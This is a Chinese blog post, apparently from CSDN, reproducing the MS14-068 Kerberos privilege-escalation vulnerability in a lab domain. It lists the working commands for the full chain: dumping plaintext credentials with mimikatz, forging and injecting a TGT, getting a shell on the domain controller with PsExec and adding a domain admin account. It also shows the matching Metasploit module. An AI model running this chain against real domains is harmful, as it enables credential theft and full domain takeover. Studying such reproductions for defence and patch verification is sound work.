复现MS14-068

已于 2024-05-21 11:09:13 修改
阅读量475 收藏
点赞数 1
文章标签: 安全 服务器 网络
于 2023-05-23 20:16:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yhl_Z/article/details/130834604
版权

文章目录

MS14-068

漏洞概述

该漏洞允许黑客提升任意普通用户权限成为域管理员(Domain Admin)身份。也就是说,你在一台普通域用户的机器上利用这个漏洞,那么这个域用户就变成域管理员权限,然后该域用户就可以控制整个域的所有机器了。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的域控服务器中,都可进行利用。

影响版本:全部版本Windows服务器

环境

域:xxx.local
域控:win server 2008 192.168.254.140
域内主机:win7 192.168.254.143

利用条件

1、获取域普通用户的账号密码
2、获取域普通用户的sid
3、服务器未打KB3011780补丁
4、域控服务器的IP

漏洞利用思路

1、首先利用ms14-068提权工具生成伪造的kerberos协议认证证书(黄金票据)
2、利用mimikatz.exe将证书写入,从而提升为域管理员 
3、测试是否能访问域控C盘目录,能访问则说明提升为域管理员
4、利用PsExec.exe获取域控shell,添加用户并将其加入域管理员组

net config workstation,可知域名和其他信息
nltest /dsgetdc:域名,可知 DC 主机名
whoami /all 查看用户sid
查看当前用户是否为域用户
net user wintext /domain

在这里插入图片描述

查看域控是否打ms14-068漏洞补丁

使用systeminfo命令查看所打补丁,发现没有KB3011780,可以利用

在这里插入图片描述

获取域控信息
net group “domain controllers” /domain

在这里插入图片描述

得到了域名server-2008以及域控的主机名
Ping一下该域控的主机名,以找到域控ip地址
注意:ping的时候去掉主机名后面的 $ 符号

在这里插入图片描述

ip 192.168.254.140

通过dir访问域控的共享文件夹,显示拒绝访问

在这里插入图片描述

获取当前域机器的域用户名、密码、用户sid等信息
获取用户sid(当前用户是域用户)
whoami /user

在这里插入图片描述

获取域内所有用户的 SID:
wmic useraccount get name,sid

在这里插入图片描述

不是域用户

用mimikatz 抓取本地的域用户密码

管理员权限运行

输入privilege::debug 权限提升,在输入log 会在当前文件夹下生成后面命令执行的结果方便我们查找数据,最后输入sekurlsa::logonPasswords 抓取密码

会在当前目录生成mimikatz 日志文件

成功获取到明文密码,也获取了域用户sid 和域控主机名

删除系统原有票据

klist查看当前缓存的票据
为了防止影响我们的操作,删除已有的票据 klist purge

在这里插入图片描述

生成票据
ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
ms14-068.py -u 域成员@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码
会在当前目录生成一个ccache文件

在这里插入图片描述

再使用mimikatz将票据(TGT)注入到当前内存中,来伪造kerberos协议认证证书。
kerberos::purge         //清空当前所有凭证
kerberos::list          //查看当前凭证
kerberos::ptc TGT_tidetest@tide.org.ccache   //将票据注入到内存中

在这里插入图片描述

成功访问(管理员权限)

在这里插入图片描述

可以看到票据里只有我的当前用户

在这里插入图片描述

用PsExec.exe工具反弹cmd,获取一个交互式shell

在这里插入图片描述

看到域控的ip

在这里插入图片描述

添加域管理员
net user linlin 123.com /add /domain
net group “Domain admins” linlin /add /domain

在这里插入图片描述

在这里插入图片描述

清除则不能访问

Metasploit 中进行测试(扩展后面没搞了)

在 MSF 中,也有一个针对 MS14-068 漏洞利用的模块:

use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

它只需要输入域名、被提权用户的密码、被提权用户、被提权用户的SID,域控制器的IP:

域成员:
域名:
域成员的 sid:
域控制器地址:
域成员的密码:
set domain 
set password 
set user 
set user_sid 
set rhosts 
run

在这里插入图片描述

在这里插入图片描述

生成

/root/.msf4/loot/20221114105328_default_192.168.254.133_windows.kerberos_896806.bin

在 mimikatz 中输入命令,导出 kirbi 格式的文件:

kerberos::clist "20221114105328_default_192.168.254.133_windows.kerberos_896806.bin" /export

在这里插入图片描述

@Y.lin
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
内网渗透(四十)之横向移动篇-ms14-068传递获取域管横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-18 708
ms14-068漏洞主要通过伪造域管的TGT,将普通用户权限提权为域管权限,以此来控制域控。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的域控服务器中,都可进行利用这里就涉及到了我们之前所讲的PAC这个东西了,我们在关于 Kerberos 认证流程的介绍中提到了 PAC(Privilege Attribute Certificate)这个东西,这是微软为了访问控制而引进的一个扩展,即特权访问证书。
kerberos-MS14-068(kerberos域用户提权)
Ms08067安全实验室
11-20 217
点击星标,即时接收最新推文微软官方在2014年11月18日发布了一个紧急补丁,Windows全版本服务器系统受到影响,包括Windows Server 2003,Windows Server 2008,Windows Server 2008 R2,Windows Server 2012和Windows Server 2012 R2,修复了Microsoft Windows Kerberos KDC...
MS14-068复现
https://www.cnblogs.com/zpchcbd/
09-15 695
kerberos认证流程非常的重要 1、生成TGT: net config workstation ms14-068.exe -u yuyonghu01@top.pentest.top -s S-1-5-21-2174377853-1962599352-171107088-1128 -d top.pentest.top 生成的票据: 2、注入TGT: 1)先查看自己的klist 如...
域内提权之MS14-068
good good study
03-17 4655
目标:普通域成员——>域管理员 漏洞利用前提 域控没有打MS14-068的补丁(KB3011780) 拿下一台加入域的计算机 有这台域内计算机的域用户密码和Sid 漏洞复现 环境: win2012(192.168.10.2) 域控,开启了防火墙 win7(192.168.10.5),域成员 1. win7获取域账户的密码及sid值 win7机器上查看域管理员,可发现,并没有自己 这里使用mimikatz去抓取域用户的明文密码 mimikatz.exe "privilege:....
MS14-068(域提权)漏洞复现
weixin_50985113的博客
06-29 718
这里便用到了我们之前所讲到的 PAC 这个东西,PAC 是用来验证 Client 的访问权限的,它会被TGT 里发送给 Client,然后由 Client 发送给 TGS。但也恰恰是这个 PAC 造成了 MS14-068 这个漏洞。该漏洞是位于 kdcsvc.dll 域控制器的密钥分发中心(KDC)服务中的 Windows 漏洞,它允许经过身份验证的用户在其获得的票证 TGT 中插入任意的 PAC。普通用户可以通过呈现具有改变了 PAC 的 TGT 来伪造票据获得管理员权限。
内网渗透---ms14068
yc的博客
05-24 2740
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、MS14-068的利用条件?二、利用步骤1.查看服务器是否打补丁2.获取用户的sid值3.删除系统票据4.生成票据5.导入票据6.提权利用总结 前言 ms14-068漏洞主要通过伪造域管的TGT,将普通用户权限提权为域管权限,以此来控制域控。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的域控服务器中,都可进行利用。 一、MS14-068的利用条件? 1、获取域普通用户的账号密码.
MS14-068 (CVE-2014-6324)域用户提权漏洞
做自己喜欢的事,并将其发挥到极致!
03-15 7163
文章目录声明一、漏洞简介二、漏洞原理三、实验环境四、漏洞利用利用思路前提条件方法一方法二方法三方法四五、参考文章 声明 本篇文章仅用于技术研究,切勿用于非法用途,仅供参考! 一、漏洞简介 远程权限提升漏洞存在于 Microsoft Windows 的 Kerberos KDC 实现中。存在该漏洞的情况为无法正确验证签名,这可能造成 Kerberos 服务票证的某些方面被人伪造。简单来说就是一个域内的普通账户可以利用此漏洞进行权限提升,升级为域管理员权限。 二、漏洞原理 Kerberos认证原理:http
ms08-067调研加完全复现
08-25
对windows的2008年的经典漏洞ms08-067进行了复现,每一步我都给出了配图,适合新手学习和使用。原创者:x
MS14-068漏洞复现
一纸荒芜的博客
08-26 3193
ms14-068漏洞复现
MS14-068域渗透
最新发布
bailandawang123的博客
03-10 393
ms14068主要是通过伪造域管的tgt,将普通用户提升为域管用户,从而控制域控。
MS14-068 漏洞分析—不安全的PAC
灰太的表格的博客
12-01 1422
MS14-068 漏洞分析—不安全的PAC
MS14-068漏洞复现
qq_56426046的博客
11-11 2961
(身份认证票据) 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。这里利用 MS14-068 来提权,先检查下是否有 MS14-068, CVE 编号CVE-2014-6324, 补丁为 3011780 : systeminfo |find "3011780",如果返回为空就说明没有打补丁,存在漏洞,需要注意的是域内普通用户提权成功后是有时效性的。也就是说,你在一台普通域用户的机器上利用这个漏洞,那么这个域用户就变成域管理员权限,然后该域用户就可以控制整个域的所有机器了。
MS14-068提权漏洞解析
weixin_43733912的博客
09-17 2697
@一、漏洞说明 欢迎使用Markdown编辑器 该漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。 微软官方解释: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2014/ms14-068 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markd
内网渗透之——域渗透中利用ms-14-068漏洞进行票据伪装获取域管账号密码
wsnbbz的博客
03-31 2492
条件 知道域名,sid,并拥有一个域普通用户的账号密码和并知道域控的名称 域名获取: ipconfig /all sid获取: whoami /all 查询域控: net time /domain 利用过程 1.利用该漏洞伪装票据 2.导出域hash 3.破解文件 利用该漏洞伪装票据 1.拿到一台普通域用户机器,获取sid 2.域名,域控名获取 (...
AD域渗透 | MS14068漏洞原理及复现
m0_57221101的博客
04-18 2541
漏洞编号MS14-068的漏洞,将允许任意用户提升到域管理员的权限,补丁编号则是KB3011780 原理分析 ​ 在之前提到白银票据攻击的时候,我们仿佛默认了一个用户可以访问任何的服务。但事实上,往往我们需要控制一些账户使他们不能访问一些服务。这时微软引入了PAC的概念,PAC包含了用户的ID,组ID一类的认证信息。进一步的PAC的分析,请期待我之后会发布的Kerberos协议的抓包分析。如果现在就想要进一步了解请看文末的链接,将导向daiker大佬的文章 ​ 在这里PAC权限验证机制产生漏洞的原因是
kali复现ms17-010
09-26
ms17-010是指一个漏洞编号为MS17-010,CVE-2017-0143/0144/0145/0146/0147/0148的漏洞。要在kali中复现ms17-010,可以使用kali中的Metasploit框架来进行操作。首先,你需要使用ms17-010的辅助模块进行扫描,可以使用命令"use auxiliary/scanner/smb/smb_ms17_010"。然后,使用ms17-010的攻击模块来执行攻击,可以使用命令"use exploit/windows/smb/ms17_010_eternalblue"。通过执行这些命令,你将能够复现ms17-010漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

@Y.lin

别急,好运都藏在努力里~~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值